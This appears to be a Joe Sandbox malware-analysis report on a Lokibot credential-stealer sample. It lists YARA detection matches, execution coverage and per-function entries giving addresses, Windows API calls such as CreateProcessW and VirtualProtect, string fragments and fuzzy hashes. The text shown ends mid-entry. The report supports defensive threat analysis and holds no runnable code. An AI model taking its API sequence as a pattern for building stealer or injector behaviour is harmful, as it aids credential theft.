Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.1683818444.0000000001248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	28.1%
Total number of Nodes:	160
Total number of Limit Nodes:	7

Executed Functions

Function 00E78355 Relevance: 8.1, Strings: 6, Instructions: 584COMMON

Download Yara Rule

Strings

EK, xrefs: 00E785BF
v7', xrefs: 00E7845F
"J|, xrefs: 00E78843
EK, xrefs: 00E785AF
v7', xrefs: 00E78455
M'5x, xrefs: 00E78B24

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID: "J|$EK$EK$M'5x$v7'$v7'
API String ID: 0-1690222722
Opcode ID: c831a6d75c79361acac0a2fe0e4806e3693c2249e84ccf23a9a8ed5237fe8bf3
Instruction ID: 3e718d6c5dc3629747ce9792daeee98f45e43b0cc94c041bb7bb96e73165b665
Opcode Fuzzy Hash: c831a6d75c79361acac0a2fe0e4806e3693c2249e84ccf23a9a8ed5237fe8bf3
Instruction Fuzzy Hash: 74326D70A442198FCB64DF64CD582EEB7B2AB94300F61D5AAD50EBB355DF308E868F41

Function 00E70006 Relevance: 4.8, APIs: 3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00E701A8
KiUserExceptionDispatcher.NTDLL ref: 00E701C6
KiUserExceptionDispatcher.NTDLL ref: 00E7033E

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a59b9a42b032a4941658516f183593aa27a62fd3376ae873c345975e498ef07f
Instruction ID: 3045ff6b247d89d777d2f8aedf04975db02113fba826e41cd7ac3ec2fffe8706
Opcode Fuzzy Hash: a59b9a42b032a4941658516f183593aa27a62fd3376ae873c345975e498ef07f
Instruction Fuzzy Hash: D8A1E835E09244CFCB45CBA4C951ADEBFB2EF89310B15C466D405EB3A1DA349D46CB92

Function 00E70090 Relevance: 4.7, APIs: 3, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00E701A8
KiUserExceptionDispatcher.NTDLL ref: 00E701C6
KiUserExceptionDispatcher.NTDLL ref: 00E7033E

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4aad0e9dbb9a480dd323d06d60c9641a82e7a4c775ce6fcfcfd7d79bf3afdb43
Instruction ID: c2eb3fa19999d7df8a6afa0be570ab76bb6e0175270d61d6ca5a9bd607a6c819
Opcode Fuzzy Hash: 4aad0e9dbb9a480dd323d06d60c9641a82e7a4c775ce6fcfcfd7d79bf3afdb43
Instruction Fuzzy Hash: 4E819E35F11104CFCB44DFA4C595AEEBBB2EB88310F21C42AD90AEB764DA31DD469B91

Function 00E77570 Relevance: 3.9, Strings: 3, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2-l, xrefs: 00E77635
wF:, xrefs: 00E775D9
2-l, xrefs: 00E7757A

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID: wF:$2-l$2-l
API String ID: 0-1051910201
Opcode ID: 337e985c78ba2b46814e7679557aa08cb0d046c0d4e1e8c2f738031580da1de5
Instruction ID: b3b1d305065c6a82fb8b2703e70466acc8227049747cb3eb0d0394e2419d2602
Opcode Fuzzy Hash: 337e985c78ba2b46814e7679557aa08cb0d046c0d4e1e8c2f738031580da1de5
Instruction Fuzzy Hash: B931022030C3028BCB681BBA55512BB65D75B85348774E53F949FEBB94EF30CC1A93A2

Function 00A6AA3F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00A6AABF

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 27e31e8b301939da9c9f09bf7ed382f6ddb9bef07f037a0af8e54dddbd83f5b4
Instruction ID: 2c938e9d076e99afd3a51090021078a2f3889f748f4d7ccb4c5c8de7aec21737
Opcode Fuzzy Hash: 27e31e8b301939da9c9f09bf7ed382f6ddb9bef07f037a0af8e54dddbd83f5b4
Instruction Fuzzy Hash: 5821DE75509380AFEB228F25DC44B52BFF4EF16310F0884DAE985CB163D271A908CB62

Function 00A6AA76 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00A6AABF

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: ead1beb4af27980546fa658e24800b842bf6c0a38cd516d48796758513b8b68c
Instruction ID: 37e9fc278f40790626865440aed526c1641ebee8477a420fbeb19e8189fb7116
Opcode Fuzzy Hash: ead1beb4af27980546fa658e24800b842bf6c0a38cd516d48796758513b8b68c
Instruction Fuzzy Hash: 7311A0716002009FDB20CF95D985B62FBF4EF28320F08C4AADD458B652D375E858DF62

Function 00E77730 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

x, xrefs: 00E7785A

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2985756205
Opcode ID: a3b895c54225034a4aa96e9539efea327942fa971e36bb212ebf3183828aa3d3
Instruction ID: a3d01844c5871002ba310cc9ccafcbd86a345b753a030536a24dd22068d90cfa
Opcode Fuzzy Hash: a3b895c54225034a4aa96e9539efea327942fa971e36bb212ebf3183828aa3d3
Instruction Fuzzy Hash: 1F71D231F09114CFDB18CB78D4406AEB7E2AF88358B21946AD94AFB350EB35DC42C792

Function 00E77726 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

x, xrefs: 00E7785A

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2985756205
Opcode ID: 0949708ec70de3826a9429681a5aee9802b39bb4243e054ba12a21f18ce1cc56
Instruction ID: b2eeb7ab0e524b94684c68736bb78c3644fac0c866b7f6cdaac9049bdf97752b
Opcode Fuzzy Hash: 0949708ec70de3826a9429681a5aee9802b39bb4243e054ba12a21f18ce1cc56
Instruction Fuzzy Hash: 2961C231F09114CFDB18CB78D4546AEB7A2AF98358F21946AD94AFB790EB31CC41C792

Function 00E75FA0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

2-l, xrefs: 00E760CD

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID: 2-l
API String ID: 0-1755203348
Opcode ID: f87212be257399156387e0ab4c33488399901c2cbdce19c79dd754278f381616
Instruction ID: 68d78ad72236d82c6d22d7c8e762d10877d4f2a8a93b30d7470092f90aef5ee1
Opcode Fuzzy Hash: f87212be257399156387e0ab4c33488399901c2cbdce19c79dd754278f381616
Instruction Fuzzy Hash: F541B770B006048BCB449BB988457AFB6E3AFC9704F50C439D51EEBB94DF759C068B91

Function 00E71938 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 994718d871b45046f143789ee96e4d517f447576344e3ad24d7e682e347b5caa
Instruction ID: fcd24138f8164b7815081465441a079408fb4aea1a2433b2ea3c9b26866104ef
Opcode Fuzzy Hash: 994718d871b45046f143789ee96e4d517f447576344e3ad24d7e682e347b5caa
Instruction Fuzzy Hash: 47419131F042158FC704CFA9C8A56BEBBF2AFC9700F15916AD519FB690CA718D068BA1

Function 00E71D47 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377c4f2a9f680f90d4b41c13e7e507dc4ed0f64b591f52d3e9e601032e5fde87
Instruction ID: 5caca58d4e500b119a7d7e1617d8978fa2b25f554024323635d92373e7a4c4bc
Opcode Fuzzy Hash: 377c4f2a9f680f90d4b41c13e7e507dc4ed0f64b591f52d3e9e601032e5fde87
Instruction Fuzzy Hash: 5C418F75E042158FCB08CFA9C9905EEBBB2FB88301F2495AAD91AF7350C734D941CB94

Function 00A6ACAC Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,DC6A4426,00000000,00000000,00000000,00000000), ref: 00A6AD46

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: cdc71f727df14540da1b89670255829eeb4b9ca6f51ef3bea37a847f4a4f2cc0
Instruction ID: 8b6f92763019cf3cf46be4a1f4db21c1fe56fcef050a6c6012e36939e02e1d5d
Opcode Fuzzy Hash: cdc71f727df14540da1b89670255829eeb4b9ca6f51ef3bea37a847f4a4f2cc0
Instruction Fuzzy Hash: 7E21D572509780AFE7128F60DC45B96BFB8EF16324F0884DBE885DF193D264A909CB71

Function 00A6ADA5 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,DC6A4426,00000000,00000000,00000000,00000000), ref: 00A6AE36

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: a24031f15ad62f16dc93f721be0afd95e74a2d768709eda876a123e86265dacf
Instruction ID: f453799c1a4082188b475ee1dce473d26a9ce7b9ce6758dcb8b2a858a7d60417
Opcode Fuzzy Hash: a24031f15ad62f16dc93f721be0afd95e74a2d768709eda876a123e86265dacf
Instruction Fuzzy Hash: 2621A3B1505380AFE722CF51CC44FA6BFBCEF56314F08849AE945DB652D265E908CB71

Function 00A6AE9C Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 00A6AF42

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: e890703558d2b89dbbd47d463feefc14ba211693987be9c7a36daaf36d217be9
Instruction ID: ff2f6db42692ec5af42940485de6b50320d3160d6cfa590b5472dcd554a17e48
Opcode Fuzzy Hash: e890703558d2b89dbbd47d463feefc14ba211693987be9c7a36daaf36d217be9
Instruction Fuzzy Hash: E521AD715093C06FD312CB65CC55B66BFB8EF87210F0984DBD884DB6A3D624A909CBB2

Function 00A6B056 Relevance: 1.6, APIs: 1, Instructions: 80
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00A6B0EF

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 55fde9879606b104052bea2a9c9f849dd26efe67338ed2e2ac3054a4bd8896dd
Instruction ID: 9fc56ea4d7a356990551906fc411810ee1b142e8bf282abbc91f2da882bd7746
Opcode Fuzzy Hash: 55fde9879606b104052bea2a9c9f849dd26efe67338ed2e2ac3054a4bd8896dd
Instruction Fuzzy Hash: A5214A72604340AFDB21CF25DC45B53BFF8EF09310F08899AE985CB662D361E854DB61

Function 00A6B082 Relevance: 1.6, APIs: 1, Instructions: 68
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00A6B0EF

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 178d6c876bedf379ef0d364e1c727350c2096b8cdfdc7318ddb1cd8182705275
Instruction ID: 6573e03859cba5a6bb295338b08ea0318b34cf1b84efd0c51ab8dbc63009f6b5
Opcode Fuzzy Hash: 178d6c876bedf379ef0d364e1c727350c2096b8cdfdc7318ddb1cd8182705275
Instruction Fuzzy Hash: 01213B726106009FEB20CF69DC41B63FBF8EF08710F08856AE949CA652E771E894DB71

Function 00A6AB0C Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A6AB78

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 175e215a516fbdce0a035b0e160fce692c090c0f88257e026d4b617a9daddc57
Instruction ID: b47526c7f592dc2a2e157faf8b981fc7a2b66e37df7c40465cf8828e5347d117
Opcode Fuzzy Hash: 175e215a516fbdce0a035b0e160fce692c090c0f88257e026d4b617a9daddc57
Instruction Fuzzy Hash: 9221A1B29093C05FDB128B25DC54792BFB4EF17324F0984DAE8858F663D2659908CB62

Function 00A6ADD2 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,DC6A4426,00000000,00000000,00000000,00000000), ref: 00A6AE36

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: c913c31e2880b4ed49da0e4094c7b1f053387a05f80420565f55b86565dcfe4a
Instruction ID: d4da48341a437c79e7bc2fc5735f9a67b97f63e0334161943e4c17af456af2c8
Opcode Fuzzy Hash: c913c31e2880b4ed49da0e4094c7b1f053387a05f80420565f55b86565dcfe4a
Instruction Fuzzy Hash: 6711B171600200AFE720CF55DC85FA6F7ECEF14724F0484AAE945DB651E775E908CA72

Function 00A6A833 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00A6A8A2

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d0615b2b4a847b6645a9124f782f664dbe835ab47335a2db393ab02b7d414dae
Instruction ID: 307473e26d5de82d039ce25ed27b095a802a7b32da43dfe4d26705b7944801ce
Opcode Fuzzy Hash: d0615b2b4a847b6645a9124f782f664dbe835ab47335a2db393ab02b7d414dae
Instruction Fuzzy Hash: C92160716053805FDB22CF25DC44B62BFF8EF56610F0884AAE985DB252D265E808CB72

Function 00A6ACEA Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,DC6A4426,00000000,00000000,00000000,00000000), ref: 00A6AD46

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 3ecdea62315da16f742d3c80bc8a23dcc1e8c04b50a5ddf47b35aedb148c6ddb
Instruction ID: 37ca14b87a65f34c650e928dd12a189eae679bdb20b404357ef55575d5c206ed
Opcode Fuzzy Hash: 3ecdea62315da16f742d3c80bc8a23dcc1e8c04b50a5ddf47b35aedb148c6ddb
Instruction Fuzzy Hash: 1811B271600200AFEB21CF55DC45BA6FBE8EF54724F0484AAE945DBA41E775E9088BB2

Function 00A6A6FC Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A6A750

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 7512f39f4e83c7ca5dd1f94790b8ff10b7b6de0ae437a061f99b6bacfc22a69a
Instruction ID: bb62d3ad06e092d608fbae5023c8049dd8d50db3b7832ebbfe7f723220ddaf29
Opcode Fuzzy Hash: 7512f39f4e83c7ca5dd1f94790b8ff10b7b6de0ae437a061f99b6bacfc22a69a
Instruction Fuzzy Hash: B211A3715093809FDB128F25DC95B52BFB8DF56220F0884EBED85CF652D275A908CB62

Function 00A6A580 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00A6A5DD

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 81c162d7ece04ad68022ff0884583b4dc59affd8ed2734634836e7b25d7a92dc
Instruction ID: 385d5c63ba9141f04710e1e1e19e3338bd990480c059ce7c4c0c7d7fe2038b20
Opcode Fuzzy Hash: 81c162d7ece04ad68022ff0884583b4dc59affd8ed2734634836e7b25d7a92dc
Instruction Fuzzy Hash: 8711A375504780AFDB228F15DC44B62FFB4EF56220F0CC49EED858B662D275A818DB61

Function 00A6A85A Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00A6A8A2

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: ec8bdc45c2697ac9390a099da56c19ec874005842b603641938a42a9b33932b2
Instruction ID: b5d834fbef7f359ea2ab1483fe3f526046ed0f11a48e2d22c28fe4b4bbce6130
Opcode Fuzzy Hash: ec8bdc45c2697ac9390a099da56c19ec874005842b603641938a42a9b33932b2
Instruction Fuzzy Hash: AF115272A002409FEB20CF59D845756FBE8EF14724F08C4AADD49DB641E675E845CE62

Function 00A6A23C Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00A6A290

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 244899806549d65fc39d71cdf986c3c5441e79cd4a52187d69c9d0186779b21b
Instruction ID: 3905052f60a4d0ca46a4fe05709bb93312af53aad133b1d83eac3613d3d64283
Opcode Fuzzy Hash: 244899806549d65fc39d71cdf986c3c5441e79cd4a52187d69c9d0186779b21b
Instruction Fuzzy Hash: E8118871809384AFD7128F15DC44B62FFB4DF56624F0880DAED858B263D275A808CB72

Function 00A6AEF2 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 00A6AF42

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 937e8c5158240e39383eb9d41f52ab680bef38a4b7fe3dd27614fa0ab5fc418c
Instruction ID: b03b799adb622fc89a0f4bce9b749ef3de38c26da6cf1281a236993376a85e67
Opcode Fuzzy Hash: 937e8c5158240e39383eb9d41f52ab680bef38a4b7fe3dd27614fa0ab5fc418c
Instruction Fuzzy Hash: 12015E71A00600AFD210DF16DC45B66FBA8EB88B20F14855AED089BB41E635B915CAA5

Function 00A6A71E Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A6A750

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 592fc97e8b646f22ec759d040493d60f17dc93606118c1da6ea863fae4060ea9
Instruction ID: 55026c5375f51bab697d491e4864c54f2f3abff7632b0cb94a7a0404ed7fc5a2
Opcode Fuzzy Hash: 592fc97e8b646f22ec759d040493d60f17dc93606118c1da6ea863fae4060ea9
Instruction Fuzzy Hash: 6601DF71A002008FEB10CF19D885766FBF4DF14320F08C4ABDC09DB642D279E848CEA2

Function 00A6AB46 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A6AB78

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 1a9ea379ef8d5862daa4358509693a4b476e5b48bcf4430aa492b94373996a9c
Instruction ID: 28b5dc2ae2f0573505c7b5d294af4fa3d35340e0d6e3c6847589e484bdb8d314
Opcode Fuzzy Hash: 1a9ea379ef8d5862daa4358509693a4b476e5b48bcf4430aa492b94373996a9c
Instruction Fuzzy Hash: 3201DF72A002008FDB10CF19D885762FBE4EF14320F08C0AADC49DB742D675E848CFA2

Function 00A6A5A2 Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00A6A5DD

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7d715ecc310c7ac2a73ebe3c7c2074c7267c8975214635d69f5bcf470855d9f0
Instruction ID: 537733cd5f09140062e103fbc9fc93a81f3ad1202fafa70c5e796b9ab76eadb9
Opcode Fuzzy Hash: 7d715ecc310c7ac2a73ebe3c7c2074c7267c8975214635d69f5bcf470855d9f0
Instruction Fuzzy Hash: 5901BC366006009FDB20CF19D885B66FBF4EF18324F08C0AADD468B652D375E858DF62

Function 00A6A25E Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00A6A290

Memory Dump Source

Source File: 00000000.00000002.1654011600.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6a000_Mcx2Xk0fqn.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a48271185273d0cb4ade6c8bd14b06072f1b489c9cefd91cc7db9fbd453369e3
Instruction ID: a7afe4b9a06a336300fd7088283dc224532e2be9cb55a2aef8ed26fee0b3459d
Opcode Fuzzy Hash: a48271185273d0cb4ade6c8bd14b06072f1b489c9cefd91cc7db9fbd453369e3
Instruction Fuzzy Hash: 07F0AF759042409FDB20CF55D8857A1FBF4EF18724F08C09ADD095B762D3BAE848CEA2

Function 00A7BA9D Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

